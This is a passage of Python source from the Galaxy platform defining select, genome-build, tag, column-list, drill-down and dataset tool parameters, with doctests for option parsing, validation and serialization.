[('argument', None), ('display', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'SelectToolParameter'), ('multiple', False), ('name', '_name'), ('optional', False), ('options', [('x_label', 'x', False), ('y_label', 'y', True), ('z_label', 'z', False)]), ('refresh_on_change', False), ('textable', False), ('type', 'select'), ('value', 'y')]
>>> p = SelectToolParameter(None, XML(
... '''
... <param name="_name" type="select" multiple="true">
... <option value="x">x_label</option>
... <option value="y" selected="true">y_label</option>
... <option value="z" selected="true">z_label</option>
... </param>
... '''))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('display', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'SelectToolParameter'), ('multiple', True), ('name', '_name'), ('optional', True), ('options', [('x_label', 'x', False), ('y_label', 'y', True), ('z_label', 'z', True)]), ('refresh_on_change', False), ('textable', False), ('type', 'select'), ('value', ['y', 'z'])]
>>> print(p.to_param_dict_string(["y", "z"]))
y,z
"""
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', False)
# Multiple selects are optional by default, single selection is the inverse.
self.optional = input_source.parse_optional(self.multiple)
self.display = input_source.get('display', None)
self.separator = input_source.get('separator', ',')
self.legal_values = set()
self.dynamic_options = input_source.get('dynamic_options', None)
self.options = parse_dynamic_options(self, input_source)
if self.options is not None:
for validator in self.options.validators:
self.validators.append(validator)
if self.dynamic_options is None and self.options is None:
self.static_options = input_source.parse_static_options()
for (_, value, _) in self.static_options:
self.legal_values.add(value)
self.is_dynamic = ((self.dynamic_options is not None) or (self.options is not None))
def _get_dynamic_options_call_other_values(self, trans, other_values):
call_other_values = ExpressionContext({'__trans__': trans})
if other_values:
call_other_values.parent = other_values.parent
call_other_values.update(other_values.dict)
return call_other_values
def get_options(self, trans, other_values):
if self.options:
return self.options.get_options(trans, other_values)
elif self.dynamic_options:
call_other_values = self._get_dynamic_options_call_other_values(trans, other_values)
try:
return eval(self.dynamic_options, self.tool.code_namespace, call_other_values)
except Exception as e:
log.debug("Error determining dynamic options for parameter '%s' in tool '%s':", self.name, self.tool.id, exc_info=e)
return []
else:
return self.static_options
def get_legal_values(self, trans, other_values, value):
"""
determine the set of values of legal options
"""
return {v for _, v, _ in self.get_options(trans, other_values)}
def get_legal_names(self, trans, other_values):
"""
determine a mapping from names to values for all legal options
"""
return {n: v for n, v, _ in self.get_options(trans, other_values)}
def from_json(self, value, trans, other_values=None, require_legal_value=True):
other_values = other_values or {}
try:
legal_values = self.get_legal_values(trans, other_values, value)
except ImplicitConversionRequired:
return value
# if the given value is not found in the set of values of the legal
# options we fall back to check if the value is in the set of names of
# the legal options. this is done with the fallback_values dict which
# allows to determine the corresponding legal values
fallback_values = self.get_legal_names(trans, other_values)
if (not legal_values or not require_legal_value) and is_runtime_context(trans, other_values):
if self.multiple:
# While it is generally allowed that a select value can be '',
# we do not allow this to be the case in a dynamically
# generated multiple select list being set in workflow building
# mode we instead treat '' as 'No option Selected' (None)
if value == '':
value = None
else:
if isinstance(value, str):
# Split on all whitespace. This not only provides flexibility
# in interpreting values but also is needed because many browsers
# use \r\n to separate lines.
value = value.split()
return value
elif value is None:
if self.optional:
return None
raise ParameterValueError("an invalid option (None) was selected, please verify", self.name, None, is_dynamic=self.is_dynamic)
elif not legal_values:
if self.optional and self.tool.profile < 18.09:
# Covers optional parameters with default values that reference other optional parameters.
# These will have a value but no legal_values.
# See https://github.com/galaxyproject/tools-iuc/pull/1842#issuecomment-394083768 for context.
return None
raise ParameterValueError("requires a value, but no legal values defined", self.name, is_dynamic=self.is_dynamic)
if isinstance(value, list):
if not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name, is_dynamic=self.is_dynamic)
if set(value).issubset(legal_values):
return value
elif set(value).issubset(set(fallback_values.keys())):
return [fallback_values[v] for v in value]
else:
raise ParameterValueError(f"invalid options ({','.join(set(value) - set(legal_values))!r}) were selected (valid options: {','.join(legal_values)})", self.name, is_dynamic=self.is_dynamic)
else:
value_is_none = (value == "None" and "None" not in legal_values)
if value_is_none or not value:
if self.multiple:
if self.optional:
return []
else:
raise ParameterValueError("no option was selected for non optional parameter", self.name, is_dynamic=self.is_dynamic)
if is_runtime_value(value):
return None
if value in legal_values:
return value
elif value in fallback_values:
return fallback_values[value]
elif not require_legal_value:
return value
else:
raise ParameterValueError(f"an invalid option ({value!r}) was selected (valid options: {','.join(legal_values)})", self.name, value, is_dynamic=self.is_dynamic)
def to_param_dict_string(self, value, other_values=None):
if value in (None, []):
return "None"
if isinstance(value, list):
if not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name, is_dynamic=self.is_dynamic)
value = list(map(str, value))
else:
value = str(value)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
value = self.sanitizer.sanitize_param(value)
else:
value = sanitize_param(value)
if isinstance(value, list):
value = self.separator.join(value)
return value
def to_json(self, value, app, use_security):
return value
def get_initial_value(self, trans, other_values):
try:
options = list(self.get_options(trans, other_values))
except ImplicitConversionRequired:
return None
if not options:
return None
value = [optval for _, optval, selected in options if selected]
if len(value) == 0:
if not self.optional and not self.multiple and options:
# Nothing selected, but not optional and not a multiple select, with some values,
# so we have to default to something (the HTML form will anyway)
value = options[0][1]
else:
value = None
elif len(value) == 1 or not self.multiple:
value = value[0]
return value
def to_text(self, value):
if not isinstance(value, list):
value = [value]
# FIXME: Currently only translating values back to labels if they
# are not dynamic
if self.is_dynamic:
rval = [str(_) for _ in value]
else:
options = list(self.static_options)
rval = []
for t, v, _ in options:
if v in value:
rval.append(t)
if rval:
return "\n".join(rval)
return "Nothing selected."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
if self.options:
return self.options.get_dependency_names()
else:
return []
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values)
# Get options, value.
options = self.get_options(trans, other_values)
d['options'] = options
d['display'] = self.display
d['multiple'] = self.multiple
d['textable'] = is_runtime_context(trans, other_values)
return d
class GenomeBuildParameter(SelectToolParameter):
"""
Select list that sets the last used genome build for the current history as "selected".
>>> # Create a mock transaction with 'hg17' as the current build
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(genome_build='hg17'), db_builds=dbkeys.read_dbnames(None))
>>> p = GenomeBuildParameter(None, XML('<param name="_name" type="genomebuild" value="hg17" />'))
>>> print(p.name)
_name
>>> d = p.to_dict(trans)
>>> o = d['options']
>>> [i for i in o if i[2] == True]
[('Human May 2004 (NCBI35/hg17) (hg17)', 'hg17', True)]
>>> [i for i in o if i[1] == 'hg18']
[('Human Mar. 2006 (NCBI36/hg18) (hg18)', 'hg18', False)]
>>> p.is_dynamic
True
"""
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
if self.tool:
self.static_options = [(value, key, False) for key, value in self._get_dbkey_names()]
self.is_dynamic = True
def get_options(self, trans, other_values):
last_used_build = object()
if trans.history:
last_used_build = trans.history.genome_build
for dbkey, build_name in self._get_dbkey_names(trans=trans):
yield build_name, dbkey, (dbkey == last_used_build)
def get_legal_values(self, trans, other_values, value):
return {dbkey for dbkey, _ in self._get_dbkey_names(trans=trans)}
def to_dict(self, trans, other_values=None):
# skip SelectToolParameter (the immediate parent) bc we need to get options in a different way here
d = ToolParameter.to_dict(self, trans)
# Get options, value - options is a generator here, so compile to list
options = list(self.get_options(trans, {}))
value = options[0][1]
for option in options:
if option[2]:
# Found selected option.
value = option[1]
d.update({
'options': options,
'value': value,
'display': self.display,
'multiple': self.multiple,
})
return d
def _get_dbkey_names(self, trans=None):
if not self.tool:
# Hack for unit tests, since we have no tool
return dbkeys.read_dbnames(None)
return self.tool.app.genome_builds.get_genome_build_names(trans=trans)
class SelectTagParameter(SelectToolParameter):
"""
Select set that is composed of a set of tags available for an input.
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.tool = tool
self.tag_key = input_source.get("group", False)
self.optional = input_source.get("optional", False)
self.multiple = input_source.get("multiple", False)
self.accept_default = input_source.get_bool("accept_default", False)
if self.accept_default:
self.optional = True
self.data_ref = input_source.get("data_ref", None)
self.ref_input = None
# Legacy style default value specification...
self.default_value = input_source.get("default_value", None)
if self.default_value is None:
# Newer style... more in line with other parameters.
self.default_value = input_source.get("value", None)
self.is_dynamic = True
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
if self.multiple:
tag_list = []
# split on newline and ,
if isinstance(value, list) or isinstance(value, str):
if not isinstance(value, list):
value = value.split('\n')
for tag_str in value:
for tag in str(tag_str).split(','):
tag = tag.strip()
if tag:
tag_list.append(tag)
value = tag_list
else:
if not value:
value = None
# We skip requiring legal values -- this is similar to optional, but allows only subset of datasets to be positive
# TODO: May not actually be required for (nested) collection input ?
return super().from_json(value, trans, other_values, require_legal_value=False)
def get_tag_list(self, other_values):
"""
Generate a select list containing the tags of the associated dataset (if found).
"""
# Get the value of the associated data reference (a dataset)
history_items = other_values.get(self.data_ref, None)
# Check if a dataset is selected
if is_runtime_value(history_items):
return []
if not history_items:
return []
tags = set()
for history_item in util.listify(history_items):
if hasattr(history_item, 'dataset_instances'):
for dataset in history_item.dataset_instances:
for tag in dataset.tags:
if tag.user_tname == 'group':
tags.add(tag.user_value)
else:
for tag in history_item.tags:
if tag.user_tname == 'group':
tags.add(tag.user_value)
return list(tags)
def get_options(self, trans, other_values):
"""
Show tags
"""
options = []
for tag in self.get_tag_list(other_values):
options.append((f"Tags: {tag}", tag, False))
return options
def get_initial_value(self, trans, other_values):
if self.default_value is not None:
return self.default_value
return SelectToolParameter.get_initial_value(self, trans, other_values)
def get_legal_values(self, trans, other_values, value):
if self.data_ref not in other_values and not trans.workflow_building_mode:
raise ValueError("Value for associated data reference not found (data_ref).")
return set(self.get_tag_list(other_values))
def get_dependencies(self):
return [self.data_ref]
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values=other_values)
d['data_ref'] = self.data_ref
return d
class ColumnListParameter(SelectToolParameter):
"""
Select list that consists of either the total number of columns or only
those columns that contain numerical values in the associated DataToolParameter.
# TODO: we need better testing here, but not sure how to associate a DatatoolParameter with a ColumnListParameter
# from a twill perspective...
>>> # Mock up a history (not connected to database)
>>> from galaxy.model import History, HistoryDatasetAssociation
>>> from galaxy.util.bunch import Bunch
>>> from galaxy.model.mapping import init
>>> sa_session = init("/tmp", "sqlite:///:memory:", create_tables=True).session
>>> hist = History()
>>> sa_session.add(hist)
>>> sa_session.flush()
>>> hda = hist.add_dataset(HistoryDatasetAssociation(id=1, extension='interval', create_dataset=True, sa_session=sa_session))
>>> dtp = DataToolParameter(None, XML('<param name="blah" type="data" format="interval"/>'))
>>> print(dtp.name)
blah
>>> clp = ColumnListParameter(None, XML('<param name="numerical_column" type="data_column" data_ref="blah" numerical="true"/>'))
>>> print(clp.name)
numerical_column
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.numerical = input_source.get_bool("numerical", False)
self.optional = input_source.parse_optional(False)
self.accept_default = input_source.get_bool("accept_default", False)
if self.accept_default:
self.optional = True
self.data_ref = input_source.get("data_ref", None)
self.ref_input = None
# Legacy style default value specification...
self.default_value = input_source.get("default_value", None)
if self.default_value is None:
# Newer style... more in line with other parameters.
self.default_value = input_source.get("value", None)
if self.default_value is not None:
self.default_value = ColumnListParameter._strip_c(self.default_value)
self.is_dynamic = True
self.usecolnames = input_source.get_bool("use_header_names", False)
def from_json(self, value, trans, other_values=None):
"""
Label convention prepends column number with a 'c', but tool uses the integer. This
removes the 'c' when entered into a workflow.
"""
other_values = other_values or {}
if self.multiple:
# split on newline and ,
if isinstance(value, list) or isinstance(value, str):
column_list = []
if not isinstance(value, list):
value = value.split('\n')
for column in value:
for column2 in str(column).split(','):
column2 = column2.strip()
if column2:
column_list.append(column2)
value = list(map(ColumnListParameter._strip_c, column_list))
else:
value = []
else:
if value:
value = ColumnListParameter._strip_c(value)
else:
value = None
if not value and self.accept_default:
value = self.default_value or '1'
return [value] if self.multiple else value
return super().from_json(value, trans, other_values)
@staticmethod
def _strip_c(column):
if isinstance(column, str):
if column.startswith('c') and len(column) > 1 and all(c.isdigit() for c in column[1:]):
column = column.strip().lower()[1:]
return column
def get_column_list(self, trans, other_values):
"""
Generate a select list containing the columns of the associated
dataset (if found).
"""
# Get the value of the associated data reference (a dataset)
dataset = other_values.get(self.data_ref)
# Check if a dataset is selected
if not dataset:
return []
column_list = None
for dataset in util.listify(dataset):
# Use representative dataset if a dataset collection is parsed
if isinstance(dataset, trans.app.model.HistoryDatasetCollectionAssociation):
dataset = dataset.to_hda_representative()
if isinstance(dataset, trans.app.model.HistoryDatasetAssociation) and self.ref_input and self.ref_input.formats:
direct_match, target_ext, converted_dataset = dataset.find_conversion_destination(self.ref_input.formats)
if not direct_match and target_ext:
if not converted_dataset:
raise ImplicitConversionRequired
else:
dataset = converted_dataset
# Columns can only be identified if the dataset is ready and metadata is available
if not hasattr(dataset, 'metadata') or \
not hasattr(dataset.metadata, 'columns') or \
not dataset.metadata.columns:
return []
# Build up possible columns for this dataset
this_column_list = []
if self.numerical:
# If numerical was requested, filter columns based on metadata
for i, col in enumerate(dataset.metadata.column_types):
if col == 'int' or col == 'float':
this_column_list.append(str(i + 1))
else:
this_column_list = [str(i) for i in range(1, dataset.metadata.columns + 1)]
# Take the intersection of these columns with the other columns.
if column_list is None:
column_list = this_column_list
else:
column_list = [c for c in column_list if c in this_column_list]
return column_list
def get_options(self, trans, other_values):
"""
Show column labels rather than c1..cn if use_header_names=True
"""
options = []
if self.usecolnames: # read first row - assume is a header with metadata useful for making good choices
dataset = other_values.get(self.data_ref, None)
try:
with open(dataset.get_file_name()) as f:
head = f.readline()
cnames = head.rstrip("\n\r ").split('\t')
column_list = [('%d' % (i + 1), 'c%d: %s' % (i + 1, x)) for i, x in enumerate(cnames)]
if self.numerical: # If numerical was requested, filter columns based on metadata
if hasattr(dataset, 'metadata') and hasattr(dataset.metadata, 'column_types'):
if len(dataset.metadata.column_types) >= len(cnames):
numerics = [i for i, x in enumerate(dataset.metadata.column_types) if x in ['int', 'float']]
column_list = [column_list[i] for i in numerics]
except Exception:
column_list = self.get_column_list(trans, other_values)
else:
column_list = self.get_column_list(trans, other_values)
for col in column_list:
if isinstance(col, tuple) and len(col) == 2:
options.append((col[1], col[0], False))
else:
options.append((f"Column: {col}", col, False))
return options
def get_initial_value(self, trans, other_values):
if self.default_value is not None:
return self.default_value
return super().get_initial_value(trans, other_values)
def get_legal_values(self, trans, other_values, value):
if self.data_ref not in other_values:
raise ValueError("Value for associated data reference not found (data_ref).")
legal_values = self.get_column_list(trans, other_values)
if value is not None:
# There are cases where 'value' is a string of comma separated values. This ensures
# that it is converted into a list, with extra whitespace around items removed.
value = util.listify(value, do_strip=True)
if not set(value).issubset(set(legal_values)) and self.is_file_empty(trans, other_values):
legal_values.extend(value)
return set(legal_values)
def is_file_empty(self, trans, other_values):
for dataset in util.listify(other_values.get(self.data_ref)):
# Use representative dataset if a dataset collection is parsed
if isinstance(dataset, trans.app.model.HistoryDatasetCollectionAssociation):
dataset = dataset.to_hda_representative()
if is_runtime_value(dataset) or not dataset.has_data():
return True
return False
def get_dependencies(self):
return [self.data_ref]
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
d = super().to_dict(trans, other_values=other_values)
d['data_ref'] = self.data_ref
d['numerical'] = self.numerical
return d
class DrillDownSelectToolParameter(SelectToolParameter):
"""
Parameter that takes on one (or many) of a specific set of values.
Creating a hierarchical select menu, which allows users to 'drill down' a tree-like set of options.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(genome_build='hg17'), db_builds=dbkeys.read_dbnames(None))
>>> p = DrillDownSelectToolParameter(None, XML(
... '''
... <param name="_name" type="drill_down" display="checkbox" hierarchy="recurse" multiple="true">
... <options>
... <option name="Heading 1" value="heading1">
... <option name="Option 1" value="option1"/>
... <option name="Option 2" value="option2"/>
... <option name="Heading 2" value="heading2">
... <option name="Option 3" value="option3"/>
... <option name="Option 4" value="option4"/>
... </option>
... </option>
... <option name="Option 5" value="option5"/>
... </options>
... </param>
... '''))
>>> print(p.name)
_name
>>> d = p.to_dict(trans)
>>> assert d['multiple'] == True
>>> assert d['display'] == 'checkbox'
>>> assert d['options'][0]['name'] == 'Heading 1'
>>> assert d['options'][0]['value'] == 'heading1'
>>> assert d['options'][0]['options'][0]['name'] == 'Option 1'
>>> assert d['options'][0]['options'][0]['value'] == 'option1'
>>> assert d['options'][0]['options'][1]['name'] == 'Option 2'
>>> assert d['options'][0]['options'][1]['value'] == 'option2'
>>> assert d['options'][0]['options'][2]['name'] == 'Heading 2'
>>> assert d['options'][0]['options'][2]['value'] == 'heading2'
>>> assert d['options'][0]['options'][2]['options'][0]['name'] == 'Option 3'
>>> assert d['options'][0]['options'][2]['options'][0]['value'] == 'option3'
>>> assert d['options'][0]['options'][2]['options'][1]['name'] == 'Option 4'
>>> assert d['options'][0]['options'][2]['options'][1]['value'] == 'option4'
>>> assert d['options'][1]['name'] == 'Option 5'
>>> assert d['options'][1]['value'] == 'option5'
"""
def __init__(self, tool, input_source, context=None):
def recurse_option_elems(cur_options, option_elems):
for option_elem in option_elems:
selected = string_as_bool(option_elem.get('selected', False))
cur_options.append({'name': option_elem.get('name'), 'value': option_elem.get('value'), 'options': [], 'selected': selected})
recurse_option_elems(cur_options[-1]['options'], option_elem.findall('option'))
input_source = ensure_input_source(input_source)
ToolParameter.__init__(self, tool, input_source)
# TODO: abstract XML out of here - so non-XML InputSources can
# specify DrillDown parameters.
elem = input_source.elem()
self.multiple = string_as_bool(elem.get('multiple', False))
self.display = elem.get('display', None)
self.hierarchy = elem.get('hierarchy', 'exact') # exact or recurse
self.separator = elem.get('separator', ',')
from_file = elem.get('from_file', None)
if from_file:
if not os.path.isabs(from_file):
from_file = os.path.join(tool.app.config.tool_data_path, from_file)
elem = XML(f"<root>{open(from_file).read()}</root>")
self.dynamic_options = elem.get('dynamic_options', None)
if self.dynamic_options:
self.is_dynamic = True
self.options = []
self.filtered = {}
if elem.find('filter'):
self.is_dynamic = True
for filter in elem.findall('filter'):
# currently only filtering by metadata key matching input file is allowed
if filter.get('type') == 'data_meta':
if filter.get('data_ref') not in self.filtered:
self.filtered[filter.get('data_ref')] = {}
if filter.get('meta_key') not in self.filtered[filter.get('data_ref')]:
self.filtered[filter.get('data_ref')][filter.get('meta_key')] = {}
if filter.get('value') not in self.filtered[filter.get('data_ref')][filter.get('meta_key')]:
self.filtered[filter.get('data_ref')][filter.get('meta_key')][filter.get('value')] = []
recurse_option_elems(self.filtered[filter.get('data_ref')][filter.get('meta_key')][filter.get('value')], filter.find('options').findall('option'))
elif not self.dynamic_options:
recurse_option_elems(self.options, elem.find('options').findall('option'))
def _get_options_from_code(self, trans=None, value=None, other_values=None):
assert self.dynamic_options, Exception("dynamic_options was not specifed")
call_other_values = ExpressionContext({'__trans__': trans, '__value__': value})
if other_values:
call_other_values.parent = other_values.parent
call_other_values.update(other_values.dict)
try:
return eval(self.dynamic_options, self.tool.code_namespace, call_other_values)
except Exception:
return []
def get_options(self, trans=None, value=None, other_values=None):
other_values = other_values or {}
if self.is_dynamic:
if self.dynamic_options:
options = self._get_options_from_code(trans=trans, value=value, other_values=other_values)
else:
options = []
for filter_key, filter_value in self.filtered.items():
dataset = other_values.get(filter_key)
if dataset.__class__.__name__.endswith("DatasetFilenameWrapper"): # this is a bad way to check for this, but problems importing class (due to circular imports?)
dataset = dataset.dataset
if dataset:
for meta_key, meta_dict in filter_value.items():
if hasattr(dataset, 'metadata') and hasattr(dataset.metadata, 'spec'):
check_meta_val = dataset.metadata.spec[meta_key].param.to_string(dataset.metadata.get(meta_key))
if check_meta_val in meta_dict:
options.extend(meta_dict[check_meta_val])
return options
return self.options
def get_legal_values(self, trans, other_values, value):
def recurse_options(legal_values, options):
for option in options:
legal_values.append(option['value'])
recurse_options(legal_values, option['options'])
legal_values = []
recurse_options(legal_values, self.get_options(trans=trans, other_values=other_values))
return legal_values
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
legal_values = self.get_legal_values(trans, other_values, value)
if not legal_values and trans.workflow_building_mode:
if self.multiple:
if value == '': # No option selected
value = None
else:
value = value.split("\n")
return value
elif value is None:
if self.optional:
return None
raise ParameterValueError(f"an invalid option ({value!r}) was selected", self.name, value)
elif not legal_values:
raise ParameterValueError("requires a value, but no legal values defined", self.name)
if not isinstance(value, list):
value = [value]
if len(value) > 1 and not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name)
rval = []
for val in value:
if val not in legal_values:
raise ParameterValueError(f"an invalid option ({val!r}) was selected (valid options: {','.join(legal_values)})", self.name, val)
rval.append(val)
return rval
def to_param_dict_string(self, value, other_values=None):
other_values = other_values or {}
def get_options_list(value):
def get_base_option(value, options):
for option in options:
if value == option['value']:
return option
rval = get_base_option(value, option['options'])
if rval:
return rval
return None # not found
def recurse_option(option_list, option):
if not option['options']:
option_list.append(option['value'])
else:
for opt in option['options']:
recurse_option(option_list, opt)
rval = []
recurse_option(rval, get_base_option(value, self.get_options(other_values=other_values)))
return rval or [value]
if value is None:
return "None"
rval = []
if self.hierarchy == "exact":
rval = value
else:
for val in value:
options = get_options_list(val)
rval.extend(options)
if len(rval) > 1 and not self.multiple:
raise ParameterValueError("multiple values provided but parameter is not expecting multiple values", self.name)
rval = self.separator.join(rval)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
rval = self.sanitizer.sanitize_param(rval)
else:
rval = sanitize_param(rval)
return rval
def get_initial_value(self, trans, other_values):
def recurse_options(initial_values, options):
for option in options:
if option['selected']:
initial_values.append(option['value'])
recurse_options(initial_values, option['options'])
# More working around dynamic options for workflow
options = self.get_options(trans=trans, other_values=other_values)
if not options:
return None
initial_values = []
recurse_options(initial_values, options)
if len(initial_values) == 0:
initial_values = None
return initial_values
def to_text(self, value):
def get_option_display(value, options):
for option in options:
if value == option['value']:
return option['name']
rval = get_option_display(value, option['options'])
if rval:
return rval
return None # not found
if not value:
value = []
elif not isinstance(value, list):
value = [value]
# FIXME: Currently only translating values back to labels if they
# are not dynamic
if self.is_dynamic:
if value:
if isinstance(value, list):
rval = value
else:
rval = [value]
else:
rval = []
else:
rval = []
for val in value:
rval.append(get_option_display(val, self.options) or val)
if rval:
return "\n".join(map(str, rval))
return "Nothing selected."
def get_dependencies(self):
"""
Get the *names* of the other params this param depends on.
"""
return list(self.filtered.keys())
def to_dict(self, trans, other_values=None):
other_values = other_values or {}
# skip SelectToolParameter (the immediate parent) bc we need to get options in a different way here
d = ToolParameter.to_dict(self, trans)
d['options'] = self.get_options(trans=trans, other_values=other_values)
d['display'] = self.display
d['multiple'] = self.multiple
return d
class BaseDataToolParameter(ToolParameter):
def __init__(self, tool, input_source, trans):
super().__init__(tool, input_source)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.min:
try:
self.min = int(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be an integer", self.name)
if self.max:
try:
self.max = int(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be an integer", self.name)
self.refresh_on_change = True
# Find datatypes_registry
if self.tool is None:
if trans:
# Must account for "Input Dataset" types, which while not a tool still need access to the real registry.
# A handle to the transaction (and thus app) will be given by the module.
self.datatypes_registry = trans.app.datatypes_registry
else:
# This occurs for things such as unit tests
import galaxy.datatypes.registry
self.datatypes_registry = galaxy.datatypes.registry.Registry()
self.datatypes_registry.load_datatypes()
else:
self.datatypes_registry = self.tool.app.datatypes_registry # can be None if self.tool.app is a ValidationContext
def _parse_formats(self, trans, input_source):
"""
Build list of classes for supported data formats
"""
self.extensions = input_source.get('format', 'data').split(",")
formats = []
if self.datatypes_registry: # This may be None when self.tool.app is a ValidationContext
normalized_extensions = [extension.strip().lower() for extension in self.extensions]
for extension in normalized_extensions:
datatype = self.datatypes_registry.get_datatype_by_extension(extension)
if datatype is not None:
formats.append(datatype)
else:
log.warning(f"Datatype class not found for extension '{extension}', which is used in the 'format' attribute of parameter '{self.name}'")
self.formats = formats
def _parse_options(self, input_source):
# TODO: Enhance dynamic options for DataToolParameters. Currently,
# only the special case key='build' of type='data_meta' is
# a valid filter
self.options_filter_attribute = None
self.options = parse_dynamic_options(self, input_source)
if self.options:
# TODO: Abstract away XML handling here.
options_elem = input_source.elem().find('options')
self.options_filter_attribute = options_elem.get('options_filter_attribute', None)
self.is_dynamic = self.options is not None
def get_initial_value(self, trans, other_values):
if trans.workflow_building_mode is workflow_building_modes.ENABLED or trans.app.name == 'tool_shed':
return RuntimeValue()
if self.optional:
return None
history = trans.history
if history is not None:
dataset_matcher_factory = get_dataset_matcher_factory(trans)
dataset_matcher = dataset_matcher_factory.dataset_matcher(self, other_values)
if isinstance(self, DataToolParameter):
for hda in reversed(history.active_visible_datasets_and_roles):
match = dataset_matcher.hda_match(hda)
if match:
return match.hda
else:
dataset_collection_matcher = dataset_matcher_factory.dataset_collection_matcher(dataset_matcher)
for hdca in reversed(history.active_visible_dataset_collections):
if dataset_collection_matcher.hdca_match(hdca):
return hdca
def to_json(self, value, app, use_security):
def single_to_json(value):
src = None
if isinstance(value, dict) and 'src' in value and 'id' in value:
return value
elif isinstance(value, galaxy.model.DatasetCollectionElement):
src = 'dce'
elif isinstance(value, app.model.HistoryDatasetCollectionAssociation):
src = 'hdca'
elif isinstance(value, app.model.LibraryDatasetDatasetAssociation):
src = 'ldda'
elif isinstance(value, app.model.HistoryDatasetAssociation) or hasattr(value, 'id'):
# hasattr 'id' fires a query on persistent objects after a flush so better
# to do the isinstance check. Not sure we need the hasattr check anymore - it'd be
# nice to drop it.
src = 'hda'
if src is not None:
object_id = galaxy.model.cached_id(value)
return {'id': app.security.encode_id(object_id) if use_security else object_id, 'src': src}
if value not in [None, '', 'None']:
if isinstance(value, list) and len(value) > 0:
values = [single_to_json(v) for v in value]
else:
values = [single_to_json(value)]
return {'values': values}
return None
def to_python(self, value, app):
def single_to_python(value):
if isinstance(value, dict) and 'src' in value:
id = value['id'] if isinstance(value['id'], int) else app.security.decode_id(value['id'])
if value['src'] == 'dce':
return app.model.context.query(app.model.DatasetCollectionElement).get(id)
elif value['src'] == 'hdca':
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(id)
elif value['src'] == 'ldda':
return app.model.context.query(app.model.LibraryDatasetDatasetAssociation).get(id)
else:
return app.model.context.query(app.model.HistoryDatasetAssociation).get(id)
if isinstance(value, dict) and 'values' in value:
if hasattr(self, 'multiple') and self.multiple is True:
return [single_to_python(v) for v in value['values']]
elif len(value['values']) > 0:
return single_to_python(value['values'][0])
# Handle legacy string values potentially stored in databases
none_values = [None, '', 'None']
if value in none_values:
return None
if isinstance(value, str) and value.find(',') > -1:
return [app.model.context.query(app.model.HistoryDatasetAssociation).get(int(v)) for v in value.split(',') if v not in none_values]
elif str(value).startswith("__collection_reduce__|"):
decoded_id = str(value)[len("__collection_reduce__|"):]
if not decoded_id.isdigit():
decoded_id = app.security.decode_id(decoded_id)
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(int(decoded_id))
elif str(value).startswith("dce:"):
return app.model.context.query(app.model.DatasetCollectionElement).get(int(value[len("dce:"):]))
elif str(value).startswith("hdca:"):
return app.model.context.query(app.model.HistoryDatasetCollectionAssociation).get(int(value[len("hdca:"):]))
else:
return app.model.context.query(app.model.HistoryDatasetAssociation).get(int(value))
def validate(self, value, trans=None):
def do_validate(v):
for validator in self.validators:
if validator.requires_dataset_metadata and v and hasattr(v, 'dataset') and v.dataset.state != galaxy.model.Dataset.states.OK:
return
else:
validator.validate(v, trans)
dataset_count = 0
if value:
if self.multiple:
if not isinstance(value, list):
value = [value]
else:
value = [value]
for v in value:
if isinstance(v, galaxy.model.HistoryDatasetCollectionAssociation):
for dataset_instance in v.collection.dataset_instances:
dataset_count += 1
do_validate(dataset_instance)
elif isinstance(v, galaxy.model.DatasetCollectionElement):
for dataset_instance in v.child_collection.dataset_instances:
dataset_count += 1
do_validate(dataset_instance)
else:
dataset_count += 1
do_validate(v)
if self.min is not None:
if self.min > dataset_count:
raise ValueError("At least %d datasets are required for %s" % (self.min, self.name))
if self.max is not None:
if self.max < dataset_count:
raise ValueError("At most %d datasets are required for %s" % (self.max, self.name))
class DataToolParameter(BaseDataToolParameter):
# TODO, Nate: Make sure the following unit tests appropriately test the dataset security
# components. Add as many additional tests as necessary.
"""
Parameter that takes on one (or many) or a specific set of values.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
TODO: The following must be fixed to test correctly for the new security_check tag in
the DataToolParameter (the last test below is broken) Nate's next pass at the dataset
security stuff will dramatically alter this anyway.
"""
def __init__(self, tool, input_source, trans=None):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source, trans)
self.load_contents = int(input_source.get("load_contents", 0))
# Add metadata validator
if not input_source.get_bool('no_validation', False):
self.validators.append(validation.MetadataValidator())
self._parse_formats(trans, input_source)
self.multiple = input_source.get_bool('multiple', False)
if not self.multiple and (self.min is not None):
raise ParameterValueError("cannot specify 'min' property on single data parameter. Set multiple=\"true\" to enable this option", self.name)
if not self.multiple and (self.max is not None):
raise ParameterValueError("cannot specify 'max' property on single data parameter. Set multiple=\"true\" to enable this option", self.name)
self.is_dynamic = True
self._parse_options(input_source)
# Load conversions required for the dataset input
self.conversions = []
for name, conv_extension in input_source.parse_conversion_tuples():
assert None not in [name, conv_extension], f'A name ({name}) and type ({conv_extension}) are required for explicit conversion'
